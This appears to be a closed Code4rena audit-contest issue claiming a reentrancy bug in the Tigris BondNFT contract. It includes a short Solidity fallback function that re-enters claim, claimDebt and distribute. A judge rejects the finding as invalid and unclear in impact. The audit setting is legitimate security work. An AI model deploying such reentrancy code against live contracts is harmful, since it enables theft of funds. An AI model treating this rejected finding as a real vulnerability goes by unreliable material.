search

code-423n4 / 2022-12-tigris-findings

8 stars 4 forks source link

SWC-107 Reentrancy CWE-841 Improper Enforcement of Behavioral Workflow #195

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/gbadebosmith/ouch/blob/a77e6c2e74a3d18f879ab97fbf1ed31cd4180b65/AttackBondNFT.sol#L192-L207

Vulnerability details

Impact

Reentrancy attack that uses fallback to call the functions named claim, claimDebt, and distribute via attack file.

Proof of Concept

sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/BondNFT.sol victim sourcecode: https://github.com/gbadebosmith/ouch/blob/main/BondNFT.sol attack code: https://github.com/gbadebosmith/ouch/blob/main/AttackBondNFT.sol

fallback() external payable {
    if (1==1) {
        bondnftfx.claim(
            2345678901,
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6
        );
        bondnftfx.claimDebt(
            _owner,
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6
        );
        bondnftfx.distribute(
            0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6,
            33
        );
    }
}

Tools Used

Remix IDE

Recommended Mitigation Steps

GalloDaSballo commented 1 year ago

Unclear what the impact is, you've reentered what did you get?

c4-judge commented 1 year ago

GalloDaSballo marked the issue as unsatisfactory: Invalid

GalloDaSballo commented 1 year ago

Closing as dup by same warden (but confusing content)

Please write more